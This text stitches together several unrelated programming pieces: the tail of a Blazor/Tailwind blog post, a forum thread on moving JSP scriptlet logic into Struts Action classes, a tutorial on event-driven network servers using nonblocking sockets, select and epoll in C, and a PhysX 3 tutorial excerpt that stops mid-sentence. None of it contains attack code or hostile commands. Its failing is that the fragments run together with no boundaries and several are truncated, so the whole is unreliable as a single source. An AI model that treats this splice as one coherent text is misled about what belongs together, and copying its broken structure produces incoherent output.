class="text-2xl">@FormatDate(image.Date)</p> @if (image.Copyright != null) { <p>Copyright: @image.Copyright</p> } </div> <div class="flex justify-center p-4"> <img src="@image.Url" class="rounded-lg h-500 w-500 flex items-center justify-center"><br /> </div> } What about CSS? In the markup, you might be wondering about the HTML classes. With CSS for this project, Chris Sainty and Jon Hilton sold me on Tailwind CSS. Tailwind is what we call utility-first, allowing you to use a variety of classes that allows you to iterate easily. It takes a little bit to get used to, but it sure beats dropping in pre-built components that find their way everywhere (hi, Bootstrap). I won’t be going too much in-depth on CSS, knowing my limitations, but that’s what the markup classes are for. Run the project locally I’d love for you to join me as we learn Blazor together. Once you clone the GitHub repo, please look at the project README.md to understand how you can get this application up and running. Wrap up I know this was a long “introduction” but I wanted a nice first post to explain everything. In this post, we introduced Blazor, talked about Blazor hosting options, and reviewed our code. Stay tuned and thanks for reading!
https://www.daveabrock.com/2020/10/26/blast-off-blazor-intro/
CC-MAIN-2021-39
refinedweb
1,686
66.33
Strange error, possibly related to var class CTest(object): def __init__(self,arg=None): var('x,y') if type(arg) is list: print [x in ZZ for x in arg] elif arg in PolynomialRing(ZZ,2,(x,y)): pass a=CTest() Traceback (most recent call last): ... File "", line 6, in __init__ UnboundLocalError: local variable 'x' referenced before assignment Replacing var('x,y') with x,y=var('x,y') eliminates the error. So does replacing PolynomialRing(ZZ,2,(x,y)) with [1,2,3]. Or changing the x in [x in ZZ for x in arg] to z. I believe this is Python local versus global variable thing. `var('x y')` injects `x` and `y` into the "global namespace", but Python considers all variables talked about inside a function to be "local", even if they have the same names. (This is good or bad, depending on whom you ask.) But I couldn't isolate the exact problem either, frustrating. Maybe this will help anyway?
https://ask.sagemath.org/question/8854/strange-error-possibly-related-to-var/
CC-MAIN-2017-04
refinedweb
163
64.51
This is part 3 of a series of posts on writing concurrent network servers. Part 1 introduced the series with some building blocks, and part 2 - Threads discussed multiple threads as one viable approach for concurrency in the server. Another common approach to achieve concurrency is called event-driven programming, or alternatively asynchronous. All posts in the series: - Part 1 - Introduction - Part 2 - Threads - Part 3 - Event-driven - Part 4 - libuv - Part 5 - Redis case study Blocking vs. nonblocking I/O As an introduction to the topic, let's talk about the difference between blocking and nonblocking I/O. Blocking I/O is easier to undestand, since this is the "normal" way we're used to I/O APIs working. While receiving data from a socket, a call to recv blocks until some data is received from the peer connected to the other side of the socket. This is precisely the issue with the sequential server of part 1. So blocking I/O has an inherent performance problem. We saw one way to tackle this problem in part 2, using multiple threads. As long as one thread is blocked on I/O, other threads can continue using the CPU. In fact, blocking I/O is usually very efficient on resource usage while the thread is waiting - the thread is put to sleep by the OS and only wakes up when whatever it was waiting for is available. Nonblocking I/O is a different approach. When a socket is set to nonblocking mode, a call to recv (and to send, but let's just focus on receiving here) will always return very quickly, even if there's no data to receive. In this case, it will return a special error status [2] notifying the caller that there's no data to receive at this time. The caller can then go do something else, or try to call recv again. The difference between blocking and nonblocking recv is easiest to demonstrate with a simple code sample. Here's a small program that listens on a socket, continuously blocking on recv; when recv returns data, the program just reports how many bytes were received [3]:); while (1) { uint8_t buf[1024]; printf("Calling recv...\n"); int len = recv(newsockfd, buf, sizeof buf, 0); if (len < 0) { perror_die("recv"); } else if (len == 0) { printf("Peer disconnected; I'm done.\n"); break; } printf("recv returned %d bytes\n", len); } close(newsockfd); close(sockfd); return 0; } The main loop repeatedly calls recv and reports what it returned (recall that recv returns 0 when the peer has disconnected). To try it out, we'll run this program in one terminal, and in a separate terminal connect to it with nc, sending a couple of short lines, separated by a delay of a couple of seconds: $ nc localhost 9988 hello # wait for 2 seconds after typing this socket world ^D # to end the connection> The listening program will print the following: $ ./blocking-listener 9988 Listening on port 9988 peer (localhost, 37284) connected Calling recv... recv returned 6 bytes Calling recv... recv returned 13 bytes Calling recv... Peer disconnected; I'm done. Now let's try a nonblocking version of the same listening program. Here it is:); // Set nonblocking mode on the socket. int flags = fcntl(newsockfd, F_GETFL, 0); if (flags == -1) { perror_die("fcntl F_GETFL"); } if (fcntl(newsockfd, F_SETFL, flags | O_NONBLOCK) == -1) { perror_die("fcntl F_SETFL O_NONBLOCK"); } while (1) { uint8_t buf[1024]; printf("Calling recv...\n"); int len = recv(newsockfd, buf, sizeof buf, 0); if (len < 0) { if (errno == EAGAIN || errno == EWOULDBLOCK) { usleep(200 * 1000); continue; } perror_die("recv"); } else if (len == 0) { printf("Peer disconnected; I'm done.\n"); break; } printf("recv returned %d bytes\n", len); } close(newsockfd); close(sockfd); return 0; } A couple of notable differences from the blocking version: - The newsockfd socket returned by accept is set to nonblocking mode by calling fcntl. - When examining the return status of recv, we check whether errno is set to a value saying that no data is available for receiving. In this case we just sleep for 200 milliseconds and continue to the next iteration of the loop. The same expermient with nc yields the following printout from this nonblocking listener: $ ./nonblocking-listener 9988 Listening on port 9988 peer (localhost, 37288) connected Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... recv returned 6 bytes Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... Calling recv... recv returned 13 bytes Calling recv... Calling recv... Calling recv... Peer disconnected; I'm done. As an exercise, add a timestamp to the printouts and convince yourself that the total time elapsed between fruitful calls to recv is more or less the delay in typing the lines into nc (rounded to the next 200 ms). So there we have it - using nonblocking recv makes it possible for the listener the check in with the socket, and regain control if no data is available yet. Another word to describe this in the domain of programming is polling - the main program periodically polls the socket for its readiness. It may seem like a potential solution to the sequential serving issue. Nonblocking recv makes it possible to work with multiple sockets simulatenously, polling them for data and only handling those that have new data. This is true - concurrent servers could be written this way; but in reality they don't, because the polling approach scales very poorly. First, the 200 ms delay I introduced in the code above is nice for the demonstration (the listener prints only a few lines of "Calling recv..." between my typing into nc as opposed to thousands), but it also incurs a delay of up to 200 ms to the server's response time, which is almost certainly undesirable. In real programs the delay would have to be much shorter, and the shorter the sleep, the more CPU the process consumes. These are cycles consumed for just waiting, which isn't great, especially on mobile devices where power matters. But the bigger problem happens when we actually have to work with multiple sockets this way. Imagine this listener is handling 1000 clients concurrently. This means that in every loop iteration, it has to do a nonblocking recv on each and every one of those 1000 sockets, looking for one which has data ready. This is terribly inefficient, and severely limits the number of clients this server can handle concurrently. There's a catch-22 here: the longer we wait between polls, the less responsive the server is; the shorter we wait, the more CPU resources we burn on useless polling. Frankly, all this polling also feels like useless work. Surely somewhere in the OS it is known which socket is actually ready with data, so we don't have to scan all of them. Indeed, it is, and the rest of this post will showcase a couple of APIs that let us handle multiple clients much more gracefully. The select system call is a portable (POSIX), venerable part of the standard Unix API. It was designed precisely for the problem described towards the end of the previous section - to allow a single thread to "watch" a non-trivial number of file descriptors [4] for changes, without needlessly spinning in a polling loop. I don't plan to include a comprehensive tutorial for select in this post - there are many websites and book chapters for that - but I will describe its API in the context of the problem we're trying to solve, and will present a fairly complete example. select enables I/O multiplexing - monitoring multiple file descriptors to see if I/O is possible on any of them. int select(int nfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, struct timeval *timeout); readfds points to a buffer of file descriptors we're watching for read events; fd_set is an opaque data structure users manipulate using FD_* macros. writefds is the same for write events. nfds is the highest file descriptor number (file descriptors are just integers) in the watched buffers. timeout lets the user specify how long select should block waiting for one of the file descriptors to be ready (timeout == NULL means block indefinitely). I'll ignore exceptfds for now. The contract of calling select is as follows: - Prior to the call, the user has to create fd_set instances for all the different kinds of descriptors to watch. If we want to watch for both read events and write events, both readfds and writefds should be created and populated. - The user uses FD_SET to set specific descriptors to watch in the set. For example, if we want to watch descriptors 2, 7 and 10 for read events, we call FD_SET three times on readfds, once for each of 2, 7 and 10. - select is called. - When select returns (let's ignore timeouts for now), it says how many descriptors in the sets passed to it are ready. It also modifies the readfds and writefds sets to mark only those descriptors that are ready. All the other descriptors are cleared. - At this point the user has to iterate over readfds and writefds to find which descriptors are ready (using FD_ISSET). As a complete example, I've reimplemented our protocol in a concurrent server that uses select. The full code is here; what follows is some highlights from the code, with explanations. Warning: this code sample is fairly substantial - so feel free to skip it on first reading if you're short on time. A concurrent server using select Using an I/O multiplexing API like select imposes certain constraints on the design of our server; these may not be immediately obvious, but are worth discussing since they are key to understanding what event-driven programming is all about. Most importantly, always keep in mind that such an approach is, in its core, single-threaded [5]. The server really is just doing one thing at a time. Since we want to handle multiple clients concurrently, we'll have to structure the code in an unusual way. First, let's talk about the main loop. How would that look? To answer this question let's imagine our server during a flurry of activity - what should it watch for? Two kinds of socket activities: - New clients trying to connect. These clients should be accept-ed. - Existing client sending data. This data has to go through the usual protocol described in part 1, with perhaps some data being sent back. Even though these two activities are somewhat different in nature, we'll have to mix them into the same loop, because there can only be one main loop. Our loop will revolve around calls to select. This select call will watch for the two kinds of events described above. Here's the part of the code that sets up the file descriptor sets and kicks off the main loop with a call to select: // The "master" sets are owned by the loop, tracking which FDs we want to // monitor for reading and which FDs we want to monitor for writing. fd_set readfds_master; FD_ZERO(&readfds_master); fd_set writefds_master; FD_ZERO(&writefds_master); // The listenting socket is always monitored for read, to detect when new // peer connections are incoming. FD_SET(listener_sockfd, &readfds_master); // For more efficiency, fdset_max tracks the maximal FD seen so far; this // makes it unnecessary for select to iterate all the way to FD_SETSIZE on // every call. int fdset_max = listener_sockfd; while (1) { // select() modifies the fd_sets passed to it, so we have to pass in copies. fd_set readfds = readfds_master; fd_set writefds = writefds_master; int nready = select(fdset_max + 1, &readfds, &writefds, NULL, NULL); if (nready < 0) { perror_die("select"); } ... A couple of points of interest here: - Since every call to select overwrites the sets given to the function, the caller has to maintain a "master" set to keep track of all the active sockets it monitors across loop iterations. - Note how, initially, the only socket we care about is listener_sockfd, which is the original socket on which the server accepts new clients. - The return value of select is the number of descriptors that are ready among those in the sets passed as arguments. The sets are modified by select to mark ready descriptors. The next step is iterating over the descriptors. ... for (int fd = 0; fd <= fdset_max && nready > 0; fd++) { // Check if this fd became readable. if (FD_ISSET(fd, &readfds)) { nready--; if (fd == listener_sockfd) { // The listening socket is ready; this means a new peer is connecting. ... } else { fd_status_t status = on_peer_ready_recv(fd); if (status.want_read) { FD_SET(fd, &readfds_master); } else { FD_CLR(fd, &readfds_master); } if (status.want_write) { FD_SET(fd, &writefds_master); } else { FD_CLR(fd, &writefds_master); } if (!status.want_read && !status.want_write) { printf("socket %d closing\n", fd); close(fd); } } This part of the loop checks the readable descriptors. Let's skip the listener socket (for the full scoop - read the code) and see what happens when one of the client sockets is ready. When this happens, we call a callback function named on_peer_ready_recv with the file descriptor for the socket. This call means the client connected to that socket sent some data and a call to recv on the socket isn't expected to block [6]. This callback returns a struct of type fd_status_t: typedef struct { bool want_read; bool want_write; } fd_status_t; Which tells the main loop whether the socket should be watched for read events, write events, or both. The code above shows how FD_SET and FD_CLR are called on the appropriate descriptor sets accordingly. The code for a descriptor being ready for writing in the main loop is similar, except that the callback it invokes is called on_peer_ready_send. Now it's time to look at the code for the callback itself: typedef enum { INITIAL_ACK, WAIT_FOR_MSG, IN_MSG } ProcessingState; #define SENDBUF_SIZE 1024 typedef struct { ProcessingState state; // sendbuf contains data the server has to send back to the client. The // on_peer_ready_recv handler populates this buffer, and on_peer_ready_send // drains it. sendbuf_end points to the last valid byte in the buffer, and // sendptr at the next byte to send. uint8_t sendbuf[SENDBUF_SIZE]; int sendbuf_end; int sendptr; } peer_state_t; // Each peer is globally identified by the file descriptor (fd) it's connected // on. As long as the peer is connected, the fd is uqique to it. When a peer // disconnects, a new peer may connect and get the same fd. on_peer_connected // should initialize the state properly to remove any trace of the old peer on // the same fd. peer_state_t global_state[MAXFDS]; fd_status_t on_peer_ready_recv(int sockfd) { assert(sockfd < MAXFDs); peer_state_t* peerstate = &global_state[sockfd]; if (peerstate->state == INITIAL_ACK || peerstate->sendptr < peerstate->sendbuf_end) { // Until the initial ACK has been sent to the peer, there's nothing we // want to receive. Also, wait until all data staged for sending is sent to // receive more data. return fd_status_W; } uint8_t buf[1024]; int nbytes = recv(sockfd, buf, sizeof buf, 0); if (nbytes == 0) { // The peer disconnected. return fd_status_NORW; } else if (nbytes < 0) { if (errno == EAGAIN || errno == EWOULDBLOCK) { // The socket is not *really* ready for recv; wait until it is. return fd_status_R; } else { perror_die("recv"); } } bool ready_to_send = false; for (int i = 0; i < nbytes; ++i) { switch (peerstate->state) { case INITIAL_ACK: assert(0 && "can't reach here"); break; case WAIT_FOR_MSG: if (buf[i] == '^') { peerstate->state = IN_MSG; } break; case IN_MSG: if (buf[i] == '$') { peerstate->state = WAIT_FOR_MSG; } else { assert(peerstate->sendbuf_end < SENDBUF_SIZE); peerstate->sendbuf[peerstate->sendbuf_end++] = buf[i] + 1; ready_to_send = true; } break; } } // Report reading readiness iff there's nothing to send to the peer as a // result of the latest recv. return (fd_status_t){.want_read = !ready_to_send, .want_write = ready_to_send}; } A peer_state_t is the full state object used to represent a client connection between callback calls from the main loop. Since a callback is invoked on some partial data sent by the client, it cannot assume it will be able to communicate with the client continuously, and it has to run quickly without blocking. It never blocks because the socket is set to non-blocking mode and recv will always return quickly. Other than calling recv, all this handler does is manipulate the state - there are no additional calls that could potentially block. An an exercise, can you figure out why this code needs an extra state? Our servers so far in the series managed with just two states, but this one needs three. Let's also have a look at the "socket ready to send" callback: fd_status_t on_peer_ready_send(int sockfd) { assert(sockfd < MAXFDs); peer_state_t* peerstate = &global_state[sockfd]; if (peerstate->sendptr >= peerstate->sendbuf_end) { // Nothing to send. return fd_status_RW; } int sendlen = peerstate->sendbuf_end - peerstate->sendptr; int nsent = send(sockfd, peerstate->sendbuf, sendlen, 0); if (nsent == -1) { if (errno == EAGAIN || errno == EWOULDBLOCK) { return fd_status_W; } else { perror_die("send"); } } if (nsent < sendlen) { peerstate->sendptr += nsent; return fd_status_W; } else { // Everything was sent successfully; reset the send queue. peerstate->sendptr = 0; peerstate->sendbuf_end = 0; // Special-case state transition in if we were in INITIAL_ACK until now. if (peerstate->state == INITIAL_ACK) { peerstate->state = WAIT_FOR_MSG; } return fd_status_R; } } Same here - the callback calls a non-blocking send and performs state manipulation. In asynchronous code, it's critical for callbacks to do their work quickly - any delay blocks the main loop from making progress, and thus blocks the whole server from handling other clients. Let's once again repeat a run of the server with the script that connects 3 clients simultaneously. In one terminal window we'll run: $ ./select-server In another: $ python3.6 simple-client.py -n 3 localhost 9090 INFO:2017-09-26 05:29:15,864:conn1 connected... INFO:2017-09-26 05:29:15,864:conn2 connected... INFO:2017-09-26 05:29:15,864:conn0 connected... INFO:2017-09-26 05:29:15,865:conn1 sending b'^abc$de^abte$f' INFO:2017-09-26 05:29:15,865:conn2 sending b'^abc$de^abte$f' INFO:2017-09-26 05:29:15,865:conn0 sending b'^abc$de^abte$f' INFO:2017-09-26 05:29:15,865:conn1 received b'bcdbcuf' INFO:2017-09-26 05:29:15,865:conn2 received b'bcdbcuf' INFO:2017-09-26 05:29:15,865:conn0 received b'bcdbcuf' INFO:2017-09-26 05:29:16,866:conn1 sending b'xyz^123' INFO:2017-09-26 05:29:16,867:conn0 sending b'xyz^123' INFO:2017-09-26 05:29:16,867:conn2 sending b'xyz^123' INFO:2017-09-26 05:29:16,867:conn1 received b'234' INFO:2017-09-26 05:29:16,868:conn0 received b'234' INFO:2017-09-26 05:29:16,868:conn2 received b'234' INFO:2017-09-26 05:29:17,868:conn1 sending b'25$^ab0000$abab' INFO:2017-09-26 05:29:17,869:conn1 received b'36bc1111' INFO:2017-09-26 05:29:17,869:conn0 sending b'25$^ab0000$abab' INFO:2017-09-26 05:29:17,870:conn0 received b'36bc1111' INFO:2017-09-26 05:29:17,870:conn2 sending b'25$^ab0000$abab' INFO:2017-09-26 05:29:17,870:conn2 received b'36bc1111' INFO:2017-09-26 05:29:18,069:conn1 disconnecting INFO:2017-09-26 05:29:18,070:conn0 disconnecting INFO:2017-09-26 05:29:18,070:conn2 disconnecting Similarly to the threaded case, there's no delay between clients - they are all handled concurrently. And yet, there are no threads in sight in select-server! The main loop multiplexes all the clients by efficient polling of multiple sockets using select. Recall the sequential vs. multi-threaded client handling diagrams from part 2. For our select-server, the time flow for three clients looks something like this: All clients are handled concurrently within the same thread, by multiplexing - doing some work for a client, switching to another, then another, then going back to the original client, etc. Note that there's no specific round-robin order here - the clients are handled when they send data to the server, which really depends on the client. Synchronous, asynchronous, event-driven, callback-based The select-server code sample provides a good background for discussing just what is meant by "asynchronous" programming, and how it relates to event-driven and callback-based programming, because all these terms are common in the (rather inconsistent) discussion of concurrent servers. Let's start with a quote from select's man page: select, pselect, FD_CLR, FD_ISSET, FD_SET, FD_ZERO - synchronous I/O multiplexing So select is for synchronous multiplexing. But I've just presented a substantial code sample using select as an example of an asynchronous server; what gives? The answer is: it depends on your point of view. Synchronous is often used as a synonym for blocking, and the calls to select are, indeed, blocking. So are the calls to send and recv in the sequential and threaded servers presented in parts 1 and 2. So it is fair to say that select is a synchronous API. However, the server design emerging from the use of select is actually asynchronous, or callback-based, or event-driven. Note that the on_peer_* functions presented in this post are callbacks; they should never block, and they get invoked due to network events. They can get partial data, and are expected to retain coherent state in-between invocations. If you've done any amont of GUI programming in the past, all of this is very familiar. There's an "event loop" that's often entirely hidden in frameworks, and the application's "business logic" is built out of callbacks that get invoked by the event loop due to various events - user mouse clicks, menu selections, timers firing, data arriving on sockets, etc. The most ubiquitous model of programming these days is, of course, client-side Javascript, which is written as a bunch of callbacks invoked by user activity on a web page. The limitations of select Using select for our first example of an asynchronous server makes sense to present the concept, and also because select is such an ubiquitous and portable API. But it also has some significant limitations that manifest when the number of watched file descriptors is very large: - Limited file descriptor set size. - Bad performance. Let's start with the file descriptor size. FD_SETSIZE is a compile-time constant that's usually equal to 1024 on modern systems. It's hard-coded deep in the guts of glibc, and isn't easy to modify. It limits the number of file descriptors a select call can watch to 1024. These days folks want to write servers that handle 10s of thousands of concurrent clients and more, so this problem is real. There are workarounds, but they aren't portable and aren't easy. The bad performance issue is a bit more subtle, but still very serious. Note that when select returns, the information it provides to the caller is the number of "ready" descriptors, and the updated descriptor sets. The descriptor sets map from desrciptor to "ready/not ready" but they don't provide a way to iterate over all the ready descriptors efficiently. If there's only a single descriptor that is ready in the set, in the worst case the caller has to iterate over the entire set to find it. This works OK when the number of descriptors watched is small, but if it gets to high numbers this overhead starts hurting [7]. For these reasons select has recently fallen out of favor for writing high-performance concurrent servers. Every popular OS has its own, non-portable APIs that permit users to write much more performant event loops; higher-level interfaces like frameworks and high-level languages usually wrap these APIs in a single portable interface. epoll As an example, let's look at epoll, Linux's solution to the high-volume I/O event notification problem. The key to epoll's efficiency is greater cooperation from the kernel. Instead of using a file descriptor set, epoll_wait fills a buffer with events that are currently ready. Only the ready events are added to the buffer, so there is no need to iterate over all the currently watched file descriptors in the client. This changes the process of discovering which descriptors are ready from O(N) in select's case to O(1). A full presentation of the epoll API is not the goal here - there are plenty of online resources for that. As you may have guessed, though, I am going to write yet another version of our concurrent server - this time using epoll instead of select. The full code sample is here. In fact, since the vast majority of the code is the same as select-server, I'll only focus on the novelty - the use of epoll in the main loop: struct epoll_event accept_event; accept_event.data.fd = listener_sockfd; accept_event.events = EPOLLIN; if (epoll_ctl(epollfd, EPOLL_CTL_ADD, listener_sockfd, &accept_event) < 0) { perror_die("epoll_ctl EPOLL_CTL_ADD"); } struct epoll_event* events = calloc(MAXFDS, sizeof(struct epoll_event)); if (events == NULL) { die("Unable to allocate memory for epoll_events"); } while (1) { int nready = epoll_wait(epollfd, events, MAXFDS, -1); for (int i = 0; i < nready; i++) { if (events[i].events & EPOLLERR) { perror_die("epoll_wait returned EPOLLERR"); } if (events[i].data.fd == listener_sockfd) { // The listening socket is ready; this means a new peer is connecting. ... } else { // A peer socket is ready. if (events[i].events & EPOLLIN) { // Ready for reading. ... } else if (events[i].events & EPOLLOUT) { // Ready for writing. ... } } } } We start by configuring epoll with a call to epoll_ctl. In this case, the configuration amounts to adding the listening socket to the descriptors epoll is watching for us. We then allocate a buffer of ready events to pass to epoll for modification. The call to epoll_wait in the main loop is where the magic's at. It blocks until one of the watched descriptors is ready (or until a timeout expires), and returns the number of ready descriptors. This time, however, instead of blindly iterating over all the watched sets, we know that epoll_write populated the events buffer passed to it with the ready events, from 0 to nready-1, so we iterate only the strictly necessary number of times. To reiterate this critical difference from select: if we're watching 1000 descriptors and two become ready, epoll_waits returns nready=2 and populates the first two elements of the events buffer - so we only "iterate" over two descriptors. With select we'd still have to iterate over 1000 descriptors to find out which ones are ready. For this reason epoll scales much better than select for busy servers with many active sockets. The rest of the code is straightforward, since we're already familiar with select-server. In fact, all the "business logic" of epoll-server is exactly the same as for select-server - the callbacks consist of the same code. This similarity is tempting to exploit by abstracting away the event loop into a library/framework. I'm going to resist this itch, because so many great programmers succumbed to it in the past. Instead, in the next post we're going to look at libuv - one of the more popular event loop abstractions emerging recently. Libraries like libuv allow us to write concurrent asynchronous servers without worrying about the greasy details of the underlying system calls.
https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/
CC-MAIN-2018-13
refinedweb
4,530
59.94
Discussions Web tier: servlets, JSP, Web frameworks: beginners question on JSP Action beginners question on JSP Action (3 messages)Can somebody help me with translating the following into a JSP action or is it not possible and do I have to keep my scriptlet in the JSP? (I'm not allowed to use JSP 2.0) UserData contains all the data concerning 1 user the definition of UserGroup public class UserGroup { private static Map users = new HashMap(); public static UserData getUser(String userid){ return (UserData) users.get(userid); } ... Threaded Messages (3) - Re: beginners question on JSP Action by Jeryl Cook on March 08 2007 20:38 EST - Re: beginners question on JSP Action by jan vos on March 09 2007 04:21 EST - Re: beginners question on JSP Action by Jeryl Cook on March 12 2007 10:39 EDT Re: beginners question on JSP Action[ Go to top ] you should put that in an Action Class. no business logic should be on the page, only Presentation code. public class UserManager{ public UserData getUserDataById(String userId){ UserData userData= null; UserDAO userDAO = DAOFactory.getUserDAO(); User user = userDAO.getUser(userId); if ( user != null){ userData = user.getSettings(); }else{ //fatal? throw new Exception("user does not exist.."); } } return userData; } UserDAO just has CRUD methods UserDAO public findAll(); public User getUserById(String id); public delete(); ... in the Action class simply use the UserManager. UserData userData = userManager.getUserDataById(id); //Handle if it is null, or exception..try catch..above.. request.setAttribute("userData",userData); in the JSP if u are using struts access it simply that way.. - Posted by: Jeryl Cook - Posted on: March 08 2007 20:38 EST - in response to jan vos Re: beginners question on JSP Action[ Go to top ] thank you, this is a great help I'm learning it all in trying to rewrite a legacy application. So it's the purpose to remove all the business logic to a separate layer. I see now that I got stuck because I tried to stay to close to the legacy code. So thanks again. - Posted by: jan vos - Posted on: March 09 2007 04:21 EST - in response to Jeryl Cook Re: beginners question on JSP Action[ Go to top ] email me if u need something else.. yes remove it, and u should be using a MVC framework as well like Struts. Model = ActionForm, model objects View = the JSP Control = the Action Classes, that access your service classes. - Posted by: Jeryl Cook - Posted on: March 12 2007 10:39 EDT - in response to jan vos
http://www.theserverside.com/discussions/thread.tss?thread_id=44557
CC-MAIN-2014-42
refinedweb
421
63.29
(For more resources related to this topic, see here.) Scene and Actors You must have heard the quote written by William Shakespeare: "All the world's a stage, and all the men and women merely players: they have their exits and their entrances; and one man in his time plays many parts, his acts being seven ages." As per my interpretation, he wanted to say that this world is like a stage, and human beings are like players or actors who perform our role in it. Every actor may have his own discrete personality and influence, but there is only one stage, with a finite area, predefined props, and lighting conditions. In the same way, a world in PhysX is known as scene and the players performing their role are known as actors. A scene defines the property of the world in which a simulation takes place, and its characteristics are shared by all of the actors created in the scene. A good example of a scene property is gravity, which affects all of the actors being simulated in a scene. Although different actors can have different properties, independent of the scene. An instance of a scene can be created using the PxScene class. An actor is an object that can be simulated in a PhysX scene. It can have properties, such as shape, material, transform, and so on. An actor can be further classified as a static or dynamic actor; if it is a static one, think of it as a prop or stationary object on a stage that is always in a static position, immovable by simulation; if it is dynamic, think of it as a human or any other moveable object on the stage that can have its position updated by the simulation. Dynamic actors can have properties like mass, momentum, velocity, or any other rigid body related property. An instance of static actor can be created by calling PxPhysics::createRigidStatic() function, similarly an instance of dynamic actor can be created by calling PxPhysics::createRigidDynamic() function. Both functions require single parameter of PxTransform type, which define the position and orientation of the created actor. Materials In PhysX, a material is the property of a physical object that defines the friction and restitution property of an actor, and is used to resolve the collision with other objects. To create a material, call PxPhysics::createMaterial(), which requires three arguments of type PxReal; these represent static friction, dynamic friction and restitution, respectively. A typical example for creating a PhysX material is as follows: PxMaterial* mMaterial = gPhysicsSDK->createMaterial(0.5,0.5,0.5); Static friction represents the friction exerted on a rigid body when it is in a rest position, and its value can vary from 0 to infinity. On the other hand, dynamic friction is applicable to a rigid body only when it is moving, and its value should always be within 0 and 1. Restitution defines the bounciness of a rigid body and its value should always be between 0 and 1; the body will be more bouncy the closer its value is to 1. All of these values can be tweaked to make an object behave as bumpy as a Ping-Pong ball or as slippery as ice when it interacts with other objects. Shapes When we create an actor in PhysX, there are some other properties, like its shape and material, that need to be defined and used further as function parameters to create an actor. A shape in PhysX is a collision geometry that defines the collision boundaries for an actor. An actor can have more than one shape to define its collision boundary. Shapes can be created by calling PxRigidActor::createShape(), which needs at least one parameter each of type PxGeometry and PxMaterial respectively. A typical example of creating a PhysX shape of an actor is as follows: PxMaterial* mMaterial = gPhysicsSDK->createMaterial(0.5,0.5,0.5); PxRigidDynamic* sphere = gPhysicsSDK->createRigidDynamic(spherePos); sphere->createShape(PxSphereGeometry(0.5f), *mMaterial); An actor of type PxRigidStatic, which represents static actors, can have shapes such as a sphere, capsule, box, convex mesh, triangular mesh, plane, or height field. Permitted shapes for actors of the PxRigidDynamic type that represents dynamic actors depends on whether the actor is flagged as kinematic or not. If the actor is flagged as kinematic, it can have all of the shapes of an actor of the PxRigidStatic type; otherwise it can have shapes such as a sphere, capsule, box, convex mesh, but not a triangle mesh, a plane, or a height field. Creating the first PhysX 3 program Now we have enough understanding to create our first PhysX program. In this program, we initialize PhysX SDK, create a scene, and then add two actors. The first actor will be a static plane that will act as a static ground, and the second will be a dynamic cube positioned a few units above the plane. Once the simulation starts, the cube should fall on to the plane under the effect of gravity. Because this is our first PhysX code, to keep it simple, we will not draw any actor visually on the screen. We will just print the position of the falling cube on the console until it comes to rest. We will start our code by including the required header files. PxPhysicsAPI.h is the main header file for PhysX, and includes the entire PhysX API in a single header. Later on, you may want to selectively include only the header files that you need, which will help to reduce the application size. We also load the three most frequently used precompiled PhysX libraries for both the Debug and Release platform configuration of VC++ 2010 Express compiler shown as follows: In addition to the std namespace, which is a part of standard C++, we also need to add the physx namespace for PhysX, as follows: #include <iostream> #include <PxPhysicsAPI.h> //PhysX main header file //-------Loading PhysX libraries----------] #ifdef _DEBUG #pragma comment(lib, "PhysX3DEBUG_x86.lib") #pragma comment(lib, "PhysX3CommonDEBUG_x86.lib") #pragma comment(lib, "PhysX3ExtensionsDEBUG.lib") #else #pragma comment(lib, "PhysX3_x86.lib") #pragma comment(lib, "PhysX3Common_x86.lib") #pragma comment(lib, "PhysX3Extensions.lib") #endif using namespace std; using namespace physx; Initializing PhysX For initializing PhysX SDK, we first need to create an object of type PxFoundation by calling the PxCreateFoundation() function. This requires three parameters: the version ID, an allocator callback, and an error callback. The first parameter prevents a mismatch between the headers and the corresponding SDK DLL(s). The allocator callback and error callback are specific to an application, but the SDK also provides a default implementation, which is used in our program. The foundation class is needed to initialize higher-level SDKs. The code snippet for creating a foundation of PhysX SDK is as follows: static PxDefaultErrorCallback gDefaultErrorCallback; static PxDefaultAllocator gDefaultAllocatorCallback; static PxFoundation* gFoundation = NULL; //Creating foundation for PhysX gFoundation = PxCreateFoundation (PX_PHYSICS_VERSION, gDefaultAllocatorCallback, gDefaultErrorCallback); After creating an instance of the foundation class, we finally create an instance of PhysX SDK by calling the PxCreatePhysics() function. This requires three parameters: the version ID, the reference of the PxFoundation object we created earlier, and PxTolerancesScale. The PxTolerancesScale parameter makes it easier to author content on different scales and still have PhysX work as expected; however, to get started, we simply pass a default object of this type. We make sure that the PhysX device is created correctly by comparing it with NULL. If the object is not equal to NULL, the device was created successfully. The code snippet for creating an instance of PhysX SDK is as follows: static PxPhysics* gPhysicsSDK = NULL; //Creating instance of PhysX SDK gPhysicsSDK = PxCreatePhysics (PX_PHYSICS_VERSION, *gFoundation, PxTolerancesScale() ); if(gPhysicsSDK == NULL) { cerr<<"Error creating PhysX3 device, Exiting..."<<endl; exit(1); } Creating scene Once the PhysX device is created, it's time to create a PhysX scene and then add the actors to it. You can create a scene by calling PxPhysics::createScene(), which requires an instance of the PxSceneDesc class as a parameter. The object of PxSceneDesc contains the description of the properties that are required to create a scene, such as gravity. The code snippet for creating an instance of the PhysX scene is given as follows: PxScene* gScene = NULL; //Creating scene PxSceneDesc sceneDesc(gPhysicsSDK->getTolerancesScale()); sceneDesc.gravity = PxVec3(0.0f, -9.8f, 0.0f); sceneDesc.cpuDispatcher = PxDefaultCpuDispatcherCreate(1); sceneDesc.filterShader = PxDefaultSimulationFilterShader; gScene = gPhysicsSDK->createScene(sceneDesc); Then, one instance of PxMaterial is created, which will be used as a parameter for creating the actors. //Creating material PxMaterial* mMaterial = //static friction, dynamic friction, restitution gPhysicsSDK->createMaterial(0.5,0.5,0.5); Creating actors Now it's time to create actors; our first actor is a plane that will act as a ground. When we create a plane in PhysX, its default orientation is vertical, like a wall, but we want it to act like a ground. So, we have to rotate it by 90 degrees so that its normal will face upwards. This can be done using the PxTransform class to position and rotate the actor in 3D world space. Because we want to position the plane at the origin, we put the first parameter of PxTransform as PxVec3(0.0f,0.0f,0.0f); this will position the plane at the origin. We also want to rotate the plane along the z-axis by 90 degrees, so we will use PxQuat(PxHalfPi,PxVec3(0.0f,0.0f,1.0f)) as the second parameter. Now we have created a rigid static actor, but we don't have any shape defined for it. So, we will do this by calling the createShape() function and putting PxPlaneGeometry() as the first parameter, which defines the plane shape and a reference to the mMaterial that 